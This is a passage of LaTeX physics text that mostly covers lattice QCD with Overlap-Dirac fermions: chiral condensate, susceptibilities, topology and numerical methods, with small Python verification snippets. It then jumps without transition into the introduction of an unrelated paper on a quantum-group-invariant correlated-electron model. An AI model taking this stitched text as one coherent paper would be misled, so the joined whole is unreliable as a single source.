\begin{equation}
{1\over V} \sum_{x} \langle \bar\psi(x)\gamma_5\psi(x) \rangle_A
= {1\over V} {\rm Tr}[\gamma_5{\tilde D}^{-1}]= {Q\over \mu V}
\label{eq:parity}
\end{equation}
in a gauge field background with
global topology $Q$. Here ${\rm Tr}$ denotes a trace over space, color and
Dirac indices.
$\langle \bar\psi \gamma_5 \psi \rangle$ goes to zero when averaged over
all gauge field configurations.
We also find
\begin{equation}
{1\over V} \sum_{x} \langle \bar\psi(x) \psi(x) \rangle_A
= {1\over V} {\rm Tr}[{\tilde D}^{-1}] =
{|Q|\over \mu V} +
{1\over V} \sum_i {2\mu(1-\lambda_i^2)\over
\lambda_i^2(1-\mu^2) + \mu^2} ~.
\label{eq:chiral}
\end{equation}
To discuss the gauge field average of $\langle \bar\psi \psi \rangle$
in the massless limit, we have to distinguish four cases
\footnote{ We do not consider the case of one flavor QCD since the chiral
symmetry is broken by the anomaly.}:
\begin{itemize}
\item We consider full QCD with $n_f > 1$ flavors in a fixed finite
volume. Gauge fields with non-zero topology are then suppressed by
$\mu^{n_f |Q|}$, the contribution from the zeromodes to $\det D(\mu)$.
Accidental zeromodes are also suppressed by the fermion determinant,
by $\mu^{2 n_f n_z^\prime}$.
Therefore, we find from eq.~(\ref{eq:chiral})
\begin{equation}
{1\over V} \sum_{x} \langle \bar\psi(x) \psi(x) \rangle = {\cal O}(\mu)
\end{equation}
and the chiral condensate vanishes in the massless limit in a finite volume.
\item We consider full QCD with $n_f > 1$ flavors in the infinite volume
limit, taking the volume to infinity before taking the mass to zero.
In this limit we expect $\langle |Q| \rangle$ to be proportional to
$\sqrt{V}$, and therefore the first term in (\ref{eq:chiral}) will go
to zero in the infinite volume limit.
The spectrum, $\lambda_i$, becomes continuous in the infinite
volume limit, represented by a spectral density, $\rho(\lambda)$. Then
we obtain,
\begin{equation}
\lim_{\mu\rightarrow 0}\lim_{V\rightarrow \infty}{1\over V}
\sum_x \langle \bar\psi(x)\psi(x) \rangle = \pi\rho(0)
\label{eq:cond}
\end{equation}
and the chiral condensate is proportional to the spectral density at zero
just as expected in the continuum~\cite{Banks}.
\item We consider a quenched theory in a fixed finite volume.
Now, gauge field configurations with nontrivial topology and accidental
zeromodes are not suppressed by a fermion determinant, and we obtain
\begin{equation}
\lim_{\mu\rightarrow 0}{1\over V} \sum_{x} \langle \bar\psi(x) \psi(x) \rangle
= \lim_{\mu\rightarrow 0} {\langle |Q|+2n_z^\prime \rangle \over \mu V}
\label{eq:chiral_massless}
\end{equation}
$2 n_z^\prime$ is the number of accidental, paired zero modes. Since they
are lifted by a small perturbation of the gauge fields, the gauge fields
for which such accidental zero modes exist are probably of measure zero,
and we expect $\langle n_z^\prime \rangle = 0$. Thus
in any finite volume $\langle \bar\psi \psi \rangle$ diverges like
${1\over \mu}$ in the quenched theory with a coefficient equal to
${\langle |Q| \rangle \over V}$. The expectation value here is over a
pure gauge ensemble, and the coefficient is therefore expected to be
proportional to $1/\sqrt{V}$.
\item We consider a quenched theory in the infinite volume limit, taking
the volume to infinity before taking the mass to zero. Then, the first
term in (\ref{eq:chiral}) vanishes and from the second we obtain
\begin{equation}
\lim_{\mu\rightarrow 0}\lim_{V\rightarrow \infty}{1\over V}
\sum_x \langle \bar\psi(x)\psi(x) \rangle = \pi\rho(0)
\label{eq:finite_rho0}
\end{equation}
where $\rho(0)$ is the spectral density at zero in a pure gauge ensemble.
\end{itemize}
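For completeness, the limit used in the second and fourth cases can be made explicit: inserting the spectral density into the second term of (\ref{eq:chiral}), only the region $\lambda \approx 0$ survives as $\mu \rightarrow 0$, and
$$
\lim_{\mu\rightarrow 0} \int_0^1 d\lambda\, \rho(\lambda)\,
{2\mu(1-\lambda^2) \over \lambda^2(1-\mu^2)+\mu^2}
= \rho(0) \lim_{\mu\rightarrow 0} \int_0^\infty
{2\mu \over \lambda^2+\mu^2}\, d\lambda
= \rho(0) \left[ 2\arctan{\lambda\over\mu} \right]_0^\infty = \pi\rho(0) \, ,
$$
which is the familiar Banks--Casher relation.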
A two flavor theory has a flavor SU(2)$_V \times$SU(2)$_A \cong $O(4)
symmetry. Consider the (real) O(4) vector made up of
\begin{equation}
\vec\phi = (\pi^a=
i\sum_{ij} \bar\psi_i(x)\gamma_5\tau^a_{ij}\psi_j(x) ,
~ f_0=\sum_i\bar\psi_i(x)\psi_i(x))
\end{equation}
where $f_0$ is also known as $\sigma$,
and the opposite parity (real) O(4) vector made up of
\begin{equation}
\vec{\tilde\phi} = (a_0^a= -\sum_{ij} \bar\psi_i(x)\tau^a_{ij}\psi_j(x) ,
~ \eta=i\sum_i\bar\psi_i(x)\gamma_5\psi_i(x)) ~.
\end{equation}
Here $\tau^a$, $a=1,2,3$, are the SU(2) generators. All eight
components are invariant under a global U(1) rotation associated with
fermion number. Under a vector SU(2) flavor rotation, the $\pi^a$
rotate among themselves, the $a_0^a$ rotate among themselves, and
$f_0$ and $\eta$ are left invariant. Under an axial SU(2) flavor
rotation, the $\pi^a$ mix with $f_0$ and the $a_0^a$ mix with $\eta$.
Finally, under a global U(1) axial rotation, $\vec\phi$ mixes with
$\vec{\tilde\phi}$.
Consider the space averaged pion propagator
\begin{equation}
\chi_\pi = \sum_{x,y} {1\over V} \langle \pi^a(x)\pi^a(y) \rangle =
{2\over V} \langle {\rm Tr}(\gamma_5\tilde D)^{-2} \rangle ~.
\label{eq:pion1}
\end{equation}
$(\gamma_5\tilde D)^{-2}$ is diagonal in the chiral basis.
There are $|Q|$ eigenvalues equal to ${1\over\mu^2}$ and $|Q|$ zero
eigenvalues from the global topology. The non-zero eigenvalues appear
in pairs and are equal to $(1-\lambda_i^2)/
\left( \lambda_i^2(1-\mu^2) + \mu^2 \right)$, which are nothing but
the diagonal entries of ${1\over\mu}{\tilde D}^{-1}$.
Relation (\ref{eq:Goldstone}) in section~\ref{sec:intro} therefore follows.
We also obtain
\begin{eqnarray}
{1\over V} {\rm Tr}(\gamma_5\tilde D)^{-2}
&=& {|Q|\over\mu^2 V} + {1\over V} \sum_i
{2(1-\lambda_i^2) \over \lambda_i^2(1-\mu^2) + \mu^2} \cr
&=& {1\over \mu} \langle \bar\psi \psi \rangle_A \quad .
\label{eq:susp2}
\end{eqnarray}
Therefore, we find the relation
\begin{equation}
\chi_\pi = \sum_{x,y} {1\over V} \langle \pi^a(x)\pi^a(y) \rangle =
{2\over\mu} \langle \bar\psi \psi \rangle.
\label{eq:pion2}
\end{equation}
We note that this relation holds for any volume and $\mu$, configuration
by configuration. In fact, from (\ref{eq:Goldstone}) it follows that
the relation holds for any chiral random source that might be used for
stochastic estimates of $\chi_\pi$ and $\langle \bar\psi \psi \rangle$.
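The per-block identities behind (\ref{eq:susp2}) can be verified directly; the following check (ours, for illustration) confirms that $(\gamma_5\tilde D)^{-2}$ is diagonal block by block, with diagonal entries equal to ${1\over\mu}$ times those of ${\tilde D}^{-1}$:

```python
# Per-block check (ours, not from the paper): the diagonal of
# (gamma_5 tilde-D)^{-2} equals (1/mu) times the diagonal of tilde-D^{-1},
# which is why chi_pi = (2/mu) <psibar psi> holds configuration by
# configuration.
import sympy as sp

mu, lam = sp.symbols('mu lambda', positive=True)
s = sp.sqrt(1 - lam**2)
den = lam**2*(1 - mu**2) + mu**2
g5 = sp.diag(1, -1)

# generic 2x2 block of tilde-D^{-1}(mu)
Dtinv = sp.Matrix([[mu*(1 - lam**2), -lam*s],
                   [lam*s,            mu*(1 - lam**2)]])/den

M = sp.expand((g5*Dtinv)**2)              # block of (gamma_5 tilde-D)^{-2}
assert sp.simplify(M[0, 1]) == 0          # (gamma_5 tilde-D)^{-2} is diagonal
assert sp.simplify(M[0, 0] - Dtinv[0, 0]/mu) == 0
assert sp.simplify(M[0, 0] - (1 - lam**2)/den) == 0

# the diagonal of tilde-D^{-2} likewise reproduces the non-topological summand
N = sp.expand(Dtinv**2)
assert sp.simplify(N[0, 0] - (1 - lam**2)*(mu**2*(1 - lam**2) - lam**2)/den**2) == 0
```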
Using, similarly,
\begin{equation}
{1\over V} {\rm Tr}({\tilde D}^{-2})
= {|Q|\over \mu^2V} + {1\over V} \sum_i
{2(1-\lambda_i^2) \left[ \mu^2(1-\lambda_i^2) -\lambda_i^2 \right]
\over [\lambda_i^2(1-\mu^2) + \mu^2]^2}
\label{eq:susp1}
\end{equation}
we find for the space averaged $a_0$ propagator
\begin{equation}
\chi_{a_0} = \sum_{x,y} {1\over V} \langle a_0^a(x) a_0^a(y) \rangle =
- {2\over V} \langle {\rm Tr}\tilde D^{-2} \rangle =
2 \langle {d\over d\mu} \langle \bar\psi \psi \rangle_A \rangle ~.
\label{eq:a_0}
\end{equation}
For the space averaged $f_0$ propagator we find
\begin{equation}
\chi_{f_0} = \sum_{x,y} {1\over V} \langle f_0(x) f_0(y) \rangle =
{4\over V} \langle [{\rm Tr}{\tilde D}^{-1}]^2 \rangle -
{2\over V} \langle {\rm Tr}\tilde D^{-2} \rangle ~,
\label{eq:f_0}
\end{equation}
and for the space averaged $\eta$ propagator
\begin{equation}
\chi_\eta = \sum_{x,y} {1\over V} \langle \eta(x) \eta(y) \rangle =
{2\over V} \langle {\rm Tr}(\gamma_5\tilde D)^{-2} \rangle -
{4\over V} \langle [{\rm Tr}(\gamma_5\tilde D)^{-1}]^2 \rangle ~.
\label{eq:eta}
\end{equation}
To discuss these chiral susceptibilities, we again distinguish four cases:
\begin{itemize}
\item We consider full QCD with $n_f=2$ flavors in a finite volume and
recall that gauge fields with non-zero topology are suppressed by
$\mu^{2 |Q|}$, while gauge fields
with accidental zeromodes are suppressed by $\mu^{4 n_z^\prime}$ from the
fermion determinant. Using eqs.~(\ref{eq:susp2}), (\ref{eq:susp1}) and
(\ref{eq:parity}) we find
\begin{equation}
\chi_\eta - \chi_{a_0} = {8 \over V} \Biggl\langle \sum_i
{\mu^2(1-\lambda_i^2)^2
\over [\lambda_i^2(1-\mu^2) + \mu^2]^2} \Biggr\rangle
+{4 \langle |Q| \rangle\over \mu^2 V}
-{4 \langle Q^2 \rangle\over \mu^2 V} ~.
\label{eq:eta_a0}
\end{equation}
Taking the $\mu \to 0$ limit, the first term on the right hand side vanishes,
while for the others only the sectors with $Q = \pm 1$ contribute, for
which the two remaining terms cancel. Therefore we obtain
\begin{equation}
\lim_{\mu\rightarrow 0} \left( \chi_\eta - \chi_{a_0} \right) = 0 ~,
\end{equation}
and, as expected in a finite volume, the O(4) symmetry is unbroken in
the massless limit. On the other hand, consider
\begin{eqnarray}
\omega & = & \chi_\pi - \chi_{a_0} =
{2\over\mu} \langle \bar\psi \psi \rangle
- 2 \langle {d\over d\mu} \langle \bar\psi \psi \rangle_A \rangle\cr
& = &
{8 \over V} \Biggl\langle \sum_i
{\mu^2(1-\lambda_i^2)^2
\over [\lambda_i^2(1-\mu^2) + \mu^2]^2} \Biggr\rangle
+{4 \langle |Q| \rangle \over \mu^2 V} \cr
& = & \chi_\eta - \chi_{a_0}
+ {4 \langle Q^2 \rangle \over \mu^2 V}
\quad .
\label{eq:omega}
\end{eqnarray}
We have used (\ref{eq:pion2}) and (\ref{eq:a_0}) in the first line,
(\ref{eq:susp2}) and (\ref{eq:susp1}) in the second line and
(\ref{eq:eta_a0}) in the last line.
Since $\chi_\eta - \chi_{a_0}$ vanishes in the massless limit, we
obtain
\begin{equation}
\lim_{\mu\rightarrow 0} \omega =
\lim_{\mu\rightarrow 0} {4 \langle Q^2 \rangle \over \mu^2 V}~.
\label{eq:anomaly}
\end{equation}
The U(1)$_A$ symmetry, therefore, remains broken in a finite volume, due
to topology. Only the sectors with $Q = \pm 1$ contribute in the massless
limit, giving a finite result. In fact, the four-fermion operator
making up $\chi_\pi - \chi_{a_0}$, written explicitly in terms of left-
and right-handed spinors, is nothing but the 't~Hooft vertex.
\item We consider full QCD in the infinite volume limit, taking the volume
to infinity first. Then, one expects the O(4) symmetry to be broken down
to O(3)$\cong$SU(2), where the pions are the Goldstone bosons associated
with the spontaneous symmetry breaking. Eq.~(\ref{eq:pion2}) is consistent
with this expectation, implying that $m_\pi^2 \propto \mu$. The $\eta$,
on the other hand, is expected to remain massive due to the axial U(1)
anomaly. Therefore we find, using (\ref{eq:eta}), (\ref{eq:susp2})
and (\ref{eq:parity}),
\begin{eqnarray}
0 &=& \lim_{\mu\rightarrow 0}\lim_{V\rightarrow \infty} \mu \chi_\eta =
\lim_{\mu\rightarrow 0}\lim_{V\rightarrow \infty} {\mu \over V}
\sum_{x,y} \langle \eta(x) \eta(y) \rangle \cr
&=& \lim_{\mu\rightarrow 0}\lim_{V\rightarrow \infty} \left\{
2 \langle \bar\psi \psi \rangle - {4 \langle Q^2 \rangle
\over \mu V} \right\}~,
\label{eq:etamass}
\end{eqnarray}
which leads to the relation
\begin{equation}
\lim_{\mu\rightarrow 0}\lim_{V\rightarrow \infty} {2 \langle Q^2 \rangle
\over \mu V} =
\lim_{\mu\rightarrow 0}\lim_{V\rightarrow \infty} \langle \bar\psi
\psi \rangle ~,
\end{equation}
a relation that has been derived before in the continuum~\cite{Smilga}.
\item We consider a quenched theory in a fixed finite volume, assuming
two flavors of valence fermions. Now, gauge fields with non-zero
topology are not suppressed, and we obtain from (\ref{eq:eta_a0}) for
$\chi_\eta - \chi_{a_0}$ in the massless limit:
\begin{equation}
\lim_{\mu\rightarrow 0} \left( \chi_\eta - \chi_{a_0} \right) =
\lim_{\mu\rightarrow 0} {4\over \mu^2 V}
\langle |Q| + 2 n_z^\prime - Q^2 \rangle ~.
\end{equation}
Though we expect $\langle n_z^\prime \rangle = 0$ for the number of accidental
paired zero modes, we find not only that the O(4) symmetry remains broken
in the massless quenched theory in a finite volume, but that $\chi_\eta -
\chi_{a_0}$ diverges in the massless limit, unless we restrict the
quenched theory to the gauge field sector that has $|Q|=0,1$.
With this restriction, one can still see the global U(1) anomaly; however,
$\omega$ diverges as $4 \langle |Q| \rangle / (\mu^2 V)$
in the massless limit.
\item We consider a quenched theory in the infinite volume limit, taking
the volume to infinity before taking the mass to zero. From (\ref{eq:pion1})
and (\ref{eq:pion2}) it is clear that
\begin{equation}
\chi_\pi - \chi_\eta = \langle {4 Q^2 \over \mu^2 V} \rangle~.
\end{equation}
If we restrict ourselves to the topologically trivial sector, $\pi$ and $\eta$
will be degenerate. If we allow all topological sectors, the right hand
side of the above equation will diverge in the massless limit and the
$\eta$ particle will not be well defined ($\chi_\eta$ will become negative).
\end{itemize}
\section{Numerical details}
\label{sec:details}
The main quantity that needs to be computed numerically is the fermion
propagator
$\tilde D^{-1}$. Certain properties of the Overlap-Dirac operator enable us
to compute the propagator for several fermion masses at one time using the
multiple Krylov space solver~\cite{Jegerlehner} and also go directly to the
massless limit. Our numerical procedure to compute the fermion bilinear
in (\ref{eq:chiral}) and $\omega$ in (\ref{eq:omega}) proceeds as follows.
\begin{itemize}
\item We note that
\begin{equation}
H_o^2(\mu) = D^\dagger(\mu) D(\mu) = D(\mu) D^\dagger(\mu) =
\left(1-\mu^2 \right) \left[ H_o^2(0) + {\mu^2\over 1-\mu^2} \right]
\label{eq:H_o_mu}
\end{equation}
with
\begin{equation}
H_o^2(0) = {1\over 2} + {1\over 4} \left[\gamma_5\epsilon(H_w) +
\epsilon(H_w)\gamma_5 \right]
\label{eq:H_o_0}
\end{equation}
\begin{itemize}
\item Eq.~(\ref{eq:H_o_mu}) implies that we can solve the set of equations
$H_o^2(\mu) \eta(\mu) = b$ for several masses, $\mu$, simultaneously
(for the same right hand $b$) using
the multiple Krylov space solver described in
Ref.~\cite{Jegerlehner}. We will refer to this as the outer conjugate
gradient inversion.
\item It is now easy to see that $[H_o^2(\mu),\gamma_5]=0$,
implying that one can work with the source $b$ and solutions
$\eta(\mu)$ restricted to one chiral sector.
\end{itemize}
\item The numerically expensive part of the Overlap-Dirac operator is the
action of $H_o^2(0)$ on a vector since it involves the action of
$[\gamma_5\epsilon(H_w) + \epsilon(H_w)\gamma_5]$ on a vector. If the
vector $b$ is chiral ({\it i.e.} $\gamma_5 b = \pm b$) then,
$[\gamma_5\epsilon(H_w) + \epsilon(H_w)\gamma_5] b = [\gamma_5 \pm 1]
\epsilon(H_w)b$. Therefore we only need to compute the action of
$\epsilon(H_w)$ on a single vector.
\item In order to compute the action of $\epsilon(H_w)$ on a vector one needs
a representation of the operator $\epsilon(H_w)$. For this purpose we use the
optimal rational approximation for $\epsilon(H_w)$ described in Ref.~\cite{EHN}.
As described in \cite{EHN}, the action of $\epsilon(H_w)$ in the optimal
rational approximation amounts to solving equations of the form
$(H_w^2 + q_k) \eta_k = b$
for several $k$ which again can be done efficiently using the multiple Krylov
solver~\cite{Jegerlehner}. We will refer to this as the inner
conjugate gradient inversion.
\item A further improvement can be made by projecting out a few low lying eigenvectors
of $H_w$ before the action of $\epsilon(H_w)$. The low lying eigenvectors can
be computed using the Ritz functional~\cite{Ritz}. This effectively reduces the
condition number of $H_w$ and speeds up the solution of $(H_w^2 + q_k) \eta_k = b$.
In addition the low lying subspace of $H_w$ is treated exactly in the action of
$\epsilon(H_w)$ thereby improving the approximation used for $\epsilon(H_w)$.
\item Since in practice it is the action of $H_o^2(\mu)$ on a vector
that we need, we can check for the convergence of the complete operator at
each inner iteration of $\epsilon(H_w)$. This saves some small amount
of work at $\mu=0$ and more and more as $\mu$ increases, while at $\mu=1$
(corresponding to infinitely heavy fermions) no work at all is required.
\end{itemize}
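The shift structure exploited above can be illustrated with a toy projection method: since the Krylov space $K_m(A,b)$ is independent of the shift, a single basis serves all masses. The sketch below is a stand-in of our own, not the actual recurrences of Ref.~\cite{Jegerlehner}, with a small symmetric positive definite matrix playing the role of $H_o^2(0)$:

```python
# Toy illustration (ours): the Krylov space K_m(A, b) does not depend on
# the shift, so one basis serves all shifted systems (A + sigma) x = b --
# the property behind solving for several masses mu at once.  The
# multi-shift CG recurrences exploit the same fact without storing the basis.
import numpy as np

rng = np.random.default_rng(0)
n = 40
G = rng.standard_normal((n, n))
A = G @ G.T + n*np.eye(n)          # SPD stand-in for H_o^2(0)
b = rng.standard_normal(n)

V = np.zeros((n, n))               # orthonormal Krylov basis of K_n(A, b)
V[:, 0] = b/np.linalg.norm(b)
for j in range(1, n):
    w = A @ V[:, j-1]
    for _ in range(2):             # Gram-Schmidt, repeated for stability
        w -= V[:, :j] @ (V[:, :j].T @ w)
    V[:, j] = w/np.linalg.norm(w)

Tm = V.T @ A @ V                   # A projected once, reused for all shifts
for sigma in (0.0, 0.1, 1.0):
    x = V @ np.linalg.solve(Tm + sigma*np.eye(n), V.T @ b)
    assert np.allclose((A + sigma*np.eye(n)) @ x, b)
```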
We stochastically estimate ${\rm Tr}\tilde D^{-1}$,
${\rm Tr}(\gamma_5\tilde D)^{-2}$ and
${\rm Tr}\tilde D^{-2}$ in a fixed gauge field background.
To be able to do this efficiently, and in order to compute this at arbitrarily
small fermion masses, we first compute the low lying spectrum of
$\gamma_5 D(0)$ using the Ritz functional method~\cite{Ritz}. This gives us,
in particular, information about the number of zero modes and their
chirality.\footnote{The
topology and chirality information can also be obtained from the spectral
flow method of $H_w$~\cite{specflow}.}
In gauge fields with zero modes we always find
that all $|Q|$ zero modes have the same chirality. We have not found
any accidental zero mode pairs with opposite chiralities.
We then stochastically estimate the three traces above in the chiral sector
that does not have any zero modes. In this sector, the propagator with any
source is non-singular even for zero fermion mass. Given a Gaussian random
source $b$ with a definite chirality we solve the equation
$H_o(\mu)^2 \eta(\mu) = b$ for several values of $\mu$. Then we compute
$(1-\mu)\xi(\mu) = D^\dagger(\mu) \eta(\mu) - b$. The stochastic estimate of
${\rm Tr}\tilde D^{-1}$ is obtained by computing $b^\dagger \xi(\mu)$ and
averaging over several independent Gaussian chiral vectors $b$.
The stochastic estimate of ${\rm Tr}(\gamma_5\tilde D)^{-2}$
is similarly obtained by computing $\xi^\dagger(\mu)\xi(\mu)$ and
averaging over several independent Gaussian chiral vectors $b$.
To estimate ${\rm Tr}\tilde D^{-2}$ we also compute
$(1-\mu)\xi^\prime(\mu) = D(\mu) \eta(\mu) - b$. Then ${\rm Tr}\tilde D^{-2}$ is
stochastically obtained by computing ${\xi^\prime}^\dagger(\mu) \xi(\mu)$
and averaging over several independent Gaussian chiral vectors $b$.
Since the stochastic estimates were done in the chiral sector that does not
contain any zero modes, the result has to be doubled to account for the
contributions from the non-zero modes in both
chiral sectors. The contributions from the zero modes due to topology,
finally, are added on analytically from the appropriate
equations in section~\ref{sec:chiral_cond}.
Since modes with $\lambda_i^2=1$ do not contribute at
all to $\tilde D^{-1}$, we do not have to worry about double counting these
edge modes.
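Schematically, the stochastic estimate of a trace from Gaussian sources works as follows (a toy model of our own, with a generic symmetric positive definite matrix in place of the fermion matrix; names and sizes are assumptions):

```python
# Sketch (ours; names and sizes are assumptions) of the stochastic trace
# estimate: for Gaussian sources b with <b b^T> = 1,
# Tr A^{-1} = < b^T A^{-1} b >, estimated by averaging over sources.
import numpy as np

rng = np.random.default_rng(1)
n = 20
G = rng.standard_normal((n, n))
A = G @ G.T + n*np.eye(n)                 # SPD stand-in for the fermion matrix

exact = np.trace(np.linalg.inv(A))
samples = [b @ np.linalg.solve(A, b)
           for b in rng.standard_normal((2000, n))]
est = np.mean(samples)
assert abs(est - exact)/exact < 0.1       # noise falls like 1/sqrt(N_sources)
```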
\section {Numerical results}
\label{sec:results}
For our numerical simulations, we used the usual hermitian
Wilson--Dirac operator $H(m)= \gamma_5 W_w(-m)$ with a negative
fermion mass term~\cite{Herbert1} at $m=1.65$. Our main results are
for quenched $SU(3)$ $\beta=5.85$, where we have three volumes, and
$\beta=5.7$, where we considered one. In Table~\ref{tab:params}, we
show the simulation parameters and number of configurations used.
From our previous work with the spectral flow of the hermitian
Wilson--Dirac operator~\cite{specflow}, we have higher statistics
estimates of $\langle |Q| \rangle$ and $\langle Q^2\rangle$ which we
quote in Table~\ref{tab:params} with $N_{\rm top}$ configurations
used. For our stochastic estimates of the various traces, we used
$N_{\rm conf}$ configurations and $5$ stochastic Gaussian random
sources. We found $5$ sources to be sufficient. For the plots of
$\langle\bar\psi \psi\rangle/\mu$ and $\omega$, we used $N_{\rm conf}$
configurations for the topology term with all statistical errors
computed using a jackknife procedure.
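For reference, the jackknife errors quoted here are of the standard single-elimination form; a minimal sketch (our own, assuming the textbook definition, which the text does not spell out) is:

```python
# Minimal single-elimination jackknife error (our sketch, assuming the
# textbook definition).
import numpy as np

def jackknife_error(samples, estimator):
    n = len(samples)
    thetas = np.array([estimator(np.delete(samples, i)) for i in range(n)])
    return np.sqrt((n - 1)/n*np.sum((thetas - thetas.mean())**2))

# sanity check: for the sample mean the jackknife error reproduces the
# naive standard error of the mean
rng = np.random.default_rng(2)
x = rng.standard_normal(100)
assert np.isclose(jackknife_error(x, np.mean), x.std(ddof=1)/np.sqrt(len(x)))
```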
The fermion masses we used for our simulations range from $0$ to
$0.5$. We note that the number of (outer) conjugate gradient
iterations we require is typically about $50$, $90$, and $200$ with a
convergence accuracy of $10^{-6}$ (normalized by the source) for our
three volumes (in increasing order) at $\beta=5.85$. This is
consistent with our expectation that while we have chosen a chiral
source that has no overlap with the zero modes, the smallest non-zero
eigenvalues of $H_o^2(0)$ are decreasing with increasing volume. The
number of inner conjugate gradient iterations (used for the
application of $\epsilon(H_w)$ on a vector) is about 100, 105, and 150
with a convergence accuracy of $10^{-6}$ for our three volumes at
$\beta=5.85$. We projected out the 10, 10, and 20 lowest eigenvectors
of $H_w$ in the computation of $\epsilon(H_w)$, respectively, before
using the optimal rational approximation to compute $\epsilon(H_w)$ in
the orthogonal subspace. While costly, the pole
method~\cite{EHN,Herbert4} of implementing $\epsilon(H_w)$ is clearly
the most cost effective in terms of floating point operations compared
to other implementations of the Overlap--Dirac
operator~\cite{EHN,Borici}.
We show our result for $\langle\bar\psi \psi\rangle$ without the topology
term included in Figure~\ref{fig:pbp_notop}. Shown (but not discernible) are
the results for all four volumes. An expanded view for small mass is shown in
Figure~\ref{fig:pbp_notop_expanded}. For small $\mu$, a linear dependence on
$\mu$ with zero intercept is expected from Eq.~(\ref{eq:chiral}).
If there is to be a chiral condensate in the infinite volume limit the
slope near $\mu=0$ should increase with volume. To see this effect
we show $\langle\bar\psi \psi\rangle/\mu$ for all our data sets in
Figure~\ref{fig:pbp_mu}.
For sufficiently small $\mu$, we see linearity in $\mu$ due
to finite volume effects. This linearity is manifested as a constancy in
$\langle\bar\psi \psi\rangle/\mu$. As the volume is increased, the
mass region where linearity sets in is shifted to smaller values.
However, the slope near $\mu=0$ does not increase proportional to the
volume and we conclude that there is no definite evidence for a
chiral condensate in the infinite volume limit yet.
We show $\langle\bar\psi \psi\rangle$ with the topology term included in
Figure~\ref{fig:pbp_withtop}. As expected from Eq.~(\ref{eq:chiral}),
the topology term diverges in a finite volume for $\mu\rightarrow
0$. However, the singularity is decreasing for increasing volume. For
sufficiently large volumes, we expect that the quenched $\langle|Q|\rangle$
scales like $\sqrt V$. From Table~\ref{tab:params}
we see that the increase of $\langle|Q|\rangle$ from
$8^3\times 16$ to $8\times 16^3$ is consistent with a $\sqrt V$ growth.
But this is not the case when we compare the value at
$6^3\times 12$ with the one at $8^3\times 16$. This is attributed
to a finite volume effect present at $6^3\times 12$~\cite{specflow}.
More insight into the possible onset of spontaneous chiral symmetry
breaking can be obtained by studying $\omega$ in
Eq.~(\ref{eq:omega}). If chiral symmetry is broken then $\omega$
should diverge as ${1\over\mu}$; otherwise, it should go to zero as
$\mu^2$. Evidence for chiral symmetry breaking in the infinite volume
limit should show up as a ${1\over\mu}$ behavior in $\omega$ at some
moderately small fermion masses (an increase in the value of $\omega$
as one decreases the fermion mass) that turns over to a $\mu^2$
behavior at very small fermion masses. We show $\omega$ without the
topology term added in Figure~\ref{fig:omega_notop}.
We see a turnover developing in the $\beta=5.85$ data as the
volume is increased around $\mu \sim 10^{-2}$. The turnover is also
present in the data at $\beta=5.7$. Therefore it is possible that
there is an onset of chiral symmetry breaking, but the effect is not
strong enough for us to be able to extract a value for the chiral
condensate.
When we add the topology term in $\omega$, as shown in
Figure~\ref{fig:omega_withtop}, the turnover region is completely
obscured. This result demonstrates how finite volume effects relevant
for a study of chiral symmetry are
obscured by topology. To be able to extract the chiral condensate
in a quenched theory from finite volume studies it would therefore
be helpful to remove the contribution from topology. This is possible
with the Overlap-Dirac operator as demonstrated here.
\section {Conclusions}
\label{sec:conclusions}
We have derived the standard continuum relations among various
fermionic observables by working on a finite volume lattice with the
Overlap-Dirac operator. Our results are general and apply equally well
to the Overlap--Dirac operator of Neuberger~\cite{Herbert1} and
domain wall fermions for infinite extent in the extra fifth
dimension~\cite{Herbert3}. These relations do not reveal any new
physics but allow us to disentangle the contribution of topology and
simplify our numerical simulations. We should emphasize that the
relations follow only because Overlap fermions satisfy the usual
chiral symmetries at any lattice spacing, not only in the continuum
limit.
We have shown that the standard relation between the pion
susceptibility and the fermion bilinear (c.f.~(\ref{eq:pion2})) is
properly reproduced by our implementation of the Overlap-Dirac
operator even in the chiral limit. We found that for the volumes
studied the chiral condensate in the quenched approximation at small
fermion mass is dominated by the contribution from the global
topology. While this contribution eventually vanishes in the infinite
volume limit, it overpowers any signs for an onset of a non-vanishing
condensate for the volumes that we were able to study. Removing this
topological contribution, which is possible in our implementation of
the Overlap-Dirac operator, enabled us to perform a finite volume
analysis of chiral symmetry breaking. Still, our numerical simulations
for quenched $SU(3)$ gauge theory do not present strong evidence for a
chiral condensate in the infinite volume limit of the quenched theory;
however, there is some evidence for the onset of chiral symmetry breaking
as the volume is increased.
\acknowledgements
This research was supported by DOE contracts DE-FG05-85ER250000 and
DE-FG05-96ER40979. Computations were performed on the workstation
cluster, the CM-2 and the QCDSP at SCRI, and the Xolas computing
cluster at MIT's Laboratory for Computer Science.
We would like to thank H.~Neuberger for discussions.
\section{Introduction}
Integrable highly correlated electron systems have been attracting
increasing interest due to their potential applications in condensed matter
physics. The prototypical examples of such systems are the Hubbard and t-J
models as well as their supersymmetric generalizations \cite{um}.
Recently many other correlated electron models have been formulated
\cite{{dois},{doisa},{doisb},{doisc},{doisd},{tres},{tresa},{tresb}}.
Among these an interesting subclass corresponds to
models associated to the Temperley-Lieb (TL) algebras \cite{TLieb}.
For such models there exists a well established method to construct a
series of spin Hamiltonians as representations of the TL algebra and
of quantum groups, the R matrix associated with the XXZ chain being
the simplest example \cite{batch1}.
Later on, this approach was generalized by Zhang \cite{zhng} to
construct graded representations of the TL algebra using Lie
superalgebras and quantum supergroups. Along these lines a new
isotropic strongly correlated electron model was obtained \cite{quatro},
as well as its anisotropic version with periodic and closed boundary
conditions \cite{cinco}. In addition, it was shown in \cite{cinco}
that this last choice of boundary generates a quantum group invariant
model, in contrast to the traditional periodic one.
Models with quantum group invariance and closed boundary conditions
were first discussed by Martin \cite{martin} from representations
of the Hecke algebra. More recently, by means of a generalized
algebraic Bethe ansatz, Karowski and Zapletal \cite{KZ}
presented a class of quantum group invariant n-state vertex models
with closed boundary conditions.
Within the framework of the coordinate Bethe ansatz closed
spin chains invariant under $U_q(s\ell (2))$ were
investigated by Grosse et al. \cite{grosse}.
Also, an extension of the algebraic approach to the case of
graded vertex models \cite{skly} was analysed in \cite{foercb}
where a $U_q(sp\ell (2,1))$
invariant susy t-J model with closed boundary conditions was presented.
In this paper we obtain through the coordinate Bethe ansatz approach the
solution of the anisotropic, or q-deformed, electronic model proposed in
\cite{cinco}, for periodic and closed boundary conditions. Here,
``closed'' means that an operator coupling the first and last sites is
introduced into the expression of the Hamiltonian in such a way
that we obtain a quantum algebra invariant closed system
(see \cite{seis} for more details).
In particular, for the closed case the Bethe ansatz
equations are derived by extending to a graded vertex model the
systematic procedure recently developed in \cite{sete} to solve the
quantum group invariant closed spin-1 chain associated to the TL
algebra.
The paper is organized as follows. In section 2 we describe the correlated
